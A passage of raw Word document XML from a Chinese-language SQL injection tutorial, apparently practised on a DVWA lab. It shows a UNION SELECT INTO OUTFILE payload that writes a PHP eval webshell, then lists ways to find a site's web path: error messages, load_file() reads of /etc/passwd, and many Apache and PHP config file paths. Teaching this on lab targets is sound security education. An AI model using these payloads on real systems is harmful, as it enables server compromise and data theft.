          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC01E2F" w14:textId="77777777" w:rsidR="00D72672" w:rsidRPr="00FA2981" w:rsidRDefault="003B4D81" w:rsidP="00200887">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>七</w:t>
      </w:r>
      <w:r w:rsidR="00D72672" w:rsidRPr="00FA2981">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>、利用</w:t>
      </w:r>
      <w:r w:rsidR="00D72672" w:rsidRPr="00FA2981">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r w:rsidR="00D72672" w:rsidRPr="00FA2981">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>注入写入</w:t>
      </w:r>
      <w:r w:rsidR="00D72672" w:rsidRPr="00FA2981">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>webshell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E52A141" w14:textId="77777777" w:rsidR="00D72672" w:rsidRPr="00CD76A0" w:rsidRDefault="00D7267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假设我们通过phpinfo文件知道了网站的物理路径，接下来我们通过使用union select语句来写入webshell.写入需要你有写入权限等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63010C95" w14:textId="77777777" w:rsidR="007F5F8C" w:rsidRPr="00CD76A0" w:rsidRDefault="00D72672" w:rsidP="00901209">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F63D4E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‘ union select 1,’‘ INTO OUTFILE ‘/var/www/dvwa/cmd.php’ +–+</w:t>
      </w:r>
      <w:r w:rsidR="007F5F8C" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">   //</w:t>
      </w:r>
      <w:r w:rsidR="00B43162" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这种反斜找扛/</w:t>
      </w:r>
      <w:r w:rsidR="008A1B4A" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>本地没测试，大家测试一下，推见大家用两个反\\方法，例如:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4CA564" w14:textId="77777777" w:rsidR="0001544F" w:rsidRDefault="0056772E" w:rsidP="00200887">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="0056772E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://192.168.0.10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="0056772E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">:8080/dvwa/vulnerabilities/sqli/?id=1' union select "&lt;?php @eval($_POST['chopper']);?&gt;",2 into outfile </w:t>
      </w:r>
      <w:r w:rsidRPr="0056772E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>"c:\\php\\htdocs\\dvwa\\123.php"+--+&amp;Submit=Submit</w:t>
      </w:r>
      <w:r w:rsidR="00793853">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68840EFB" wp14:editId="2D3F9438">
            <wp:extent cx="5274310" cy="3672238"/>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5274310" cy="3672238"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2971D16F" w14:textId="77777777" w:rsidR="00FC1216" w:rsidRPr="00697914" w:rsidRDefault="00FC1216" w:rsidP="00604925">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00697914">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>MysQL</w:t>
      </w:r>
      <w:r w:rsidR="00D74290" w:rsidRPr="00697914">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r w:rsidRPr="00697914">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>web路径</w:t>
      </w:r>
      <w:r w:rsidR="00D74290" w:rsidRPr="00697914">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>方法总结</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7C5C94" w14:textId="77777777" w:rsidR="00C576DD" w:rsidRPr="00CD76A0" w:rsidRDefault="00C576DD"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MySQL注入中，利用load_file()函数读取网页文件源代码时，首先需要获得网站的Web路径。网站Web路径可以通过以下几种方法获得。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F857A8" w14:textId="77777777" w:rsidR="006824DD" w:rsidRPr="006F73A7" w:rsidRDefault="006F73A7" w:rsidP="00200887">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F73A7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>1、</w:t>
      </w:r>
      <w:r w:rsidR="006824DD" w:rsidRPr="006F73A7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>直接在出错信息中显示Web路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7947A337" w14:textId="77777777" w:rsidR="006824DD" w:rsidRPr="00CD76A0" w:rsidRDefault="006824D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注入点处加单引号，或者修改提交变量类型，让查询语句出错，从出错信息中往往可以爆出网站Web物理路径(</w:t>
      </w:r>
      <w:r w:rsidR="006F73A7" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>下</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>图</w:t>
      </w:r>
      <w:r w:rsidR="006F73A7" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4D775B" w14:textId="77777777" w:rsidR="006824DD" w:rsidRPr="00276D91" w:rsidRDefault="007A3F13" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B25E46F" wp14:editId="77B96A16">
            <wp:extent cx="5274310" cy="3363617"/>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5274310" cy="3363617"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E8B9FF" w14:textId="77777777" w:rsidR="00104BED" w:rsidRPr="00276D91" w:rsidRDefault="007A3F13" w:rsidP="00200887">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2、</w:t>
      </w:r>
      <w:r w:rsidR="00104BED" w:rsidRPr="00276D91">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>load_file(char(47))列出freebsd目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4534409B" w14:textId="77777777" w:rsidR="00CC2CFD" w:rsidRPr="00CD76A0" w:rsidRDefault="00CC2CF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由于load_file()函数相当于Linux系统中的cat()函数，在某些FreeBSD、Sunos系统中用“cat/”命令可以列出根目录。字符“/”的ASCII码是47，在MySQL注入中，可利用load_file(char(47))直接列出FreeBSD等*inux系统的文件夹目录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009F5367" w14:textId="77777777" w:rsidR="00250364" w:rsidRPr="00276D91" w:rsidRDefault="007A3F13" w:rsidP="00200887">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3、</w:t>
      </w:r>
      <w:r w:rsidR="00250364" w:rsidRPr="00276D91">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"/etc/passwd”文件中的工作目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4F48C4" w14:textId="77777777" w:rsidR="00232E5E" w:rsidRPr="00276D91" w:rsidRDefault="00FC18F1" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F27C043" wp14:editId="53077DF7">
            <wp:extent cx="5400675" cy="5667375"/>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400675" cy="5667375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA789CE" w14:textId="77777777" w:rsidR="00971D1C" w:rsidRPr="00CD76A0" w:rsidRDefault="00A54CF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从中可看到系统中有</w:t>
      </w:r>
      <w:r w:rsidR="00FC18F1" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>apache</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户，其工作目录为“/</w:t>
      </w:r>
      <w:r w:rsidR="00FC18F1" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>var/</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>www/ "</w:t>
      </w:r>
      <w:r w:rsidR="00FC18F1" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>有些网站会写上具体路径</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="00FC18F1" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>而且网站用户名有的就是对应/etc/passwd里面的用户或文件夹名等等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555E79ED" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00276D91" w:rsidRDefault="001827EF" w:rsidP="006472F7">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4、</w:t>
      </w:r>
      <w:r w:rsidR="002D083B" w:rsidRPr="00276D91">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读取apache的配置文件“httpd.conf”，获取Web路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24786DFD" w14:textId="77777777" w:rsidR="00F37580" w:rsidRPr="00CD76A0" w:rsidRDefault="00F3758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PHP网站程序通常都是通过apache提供服务的，apache的配置文件“httpd.conf"中包含了网站物理路径，可通过读取该文件获得Web路径。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B20442C" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00CD76A0" w:rsidRDefault="00F3758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nix系统中，可以利用laod_file()尝试读取以下路径查看"apache”配置文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE42DD7"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init.d/apache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBF737C"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lastRenderedPageBreak/>
        <w:t>/etc/init.d/apache2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBE48D7"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w:t>
      </w:r>
      <w:r w:rsidR="00EF612A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>httpd/httpd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FD566A"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apache/apache.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E91984"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apache/httpd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A84C434" w14:textId="77777777" w:rsidR="004B6C90"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apache2/apache2.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1267E446" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00644363" w:rsidRDefault="004B6C90"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apache2/httpd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36ACFBB1" w14:textId="77777777" w:rsidR="00D14C51"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usr/local/apache2/conf/httpd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254079DD" w14:textId="77777777" w:rsidR="00D14C51"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usr/local/apache/conf/httpd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358FCE7B" w14:textId="77777777" w:rsidR="00D14C51"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opt/apache/conf/httpd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F10B30" w14:textId="77777777" w:rsidR="00D14C51"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home/apache/httpd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02472DB9" w14:textId="77777777" w:rsidR="00D14C51"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home/apache/conf/httpd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB1BA4A" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00644363" w:rsidRDefault="00D14C51"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etc/apache2/sites-available/default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6044AFE7" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00CD76A0" w:rsidRDefault="00977909"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Windows系统中，可以尝试读取以下路径查看apache配置文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461D2DF9" w14:textId="77777777" w:rsidR="00BB79B4" w:rsidRPr="00644363" w:rsidRDefault="00BB79B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C:\Program Files\Apache Group\Apache\conf\httpd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6879895D" w14:textId="77777777" w:rsidR="00BB79B4" w:rsidRPr="00644363" w:rsidRDefault="00BB79B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C:\Program Files\Apache Group\Apache2\conf\httpd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1997A1CF" w14:textId="77777777" w:rsidR="00BB79B4" w:rsidRPr="00644363" w:rsidRDefault="00BB79B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C:\Program Files\Apache Software Foundation\Apache2.2\conf\httpd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692740B0" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00644363" w:rsidRDefault="00BB79B4" w:rsidP="00644363">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>C:\apache\confthttpd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E98C83" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00CD76A0" w:rsidRDefault="00417E7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也可以将换盘符C换为D, E, F等进行尝试。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C038A3" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00276D91" w:rsidRDefault="00201E46" w:rsidP="00200887">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5、</w:t>
      </w:r>
      <w:r w:rsidR="00661F95" w:rsidRPr="00276D91">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用load_file()读取各种配置文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44497DC9" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00CD76A0" w:rsidRDefault="00885E5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MySQL注入中，</w:t>
      </w:r>
      <w:r w:rsidR="001C33E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>load</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_file()函数除了用于读取网页脚本程序源代码外，还可以用来读取其他各种敏感的配置文件，方便获得WebShell或进行提权。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526B672D" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00276D91" w:rsidRDefault="006E5ADB" w:rsidP="00200887">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（1）</w:t>
      </w:r>
      <w:r w:rsidR="00355747" w:rsidRPr="00276D91">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>load_file()读取服务器配置文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D621D68" w14:textId="77777777" w:rsidR="005F2029" w:rsidRPr="00F63D4E" w:rsidRDefault="00583489" w:rsidP="00F63D4E">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前面讲解了利用load_file()函数读取“apache"配置文件，从而获得Web物理路径的方法。此外，还可利用此函数读取网站中的其他重要的配置文件，获得更多敏感的信息。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="005862E0" w14:paraId="10473620" w14:textId="77777777" w:rsidTr="005862E0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="380F2CD9"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user/local/app/apache2/conf/e</w:t>
            </w:r>
            <w:r w:rsidR="00F63D4E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">xtra/http-vhosts.conf     </w:t>
            </w:r>
            <w:r w:rsidRPr="005862E0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>//</w:t>
            </w:r>
            <w:r w:rsidR="006D0CD4" w:rsidRPr="006D0CD4">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>虚拟网站设置</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3938434B"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user/local/app/php5/lib/php.i</w:t>
            </w:r>
            <w:r w:rsidR="00F63D4E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">ni                       </w:t>
            </w:r>
            <w:r w:rsidRPr="005862E0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>//php</w:t>
            </w:r>
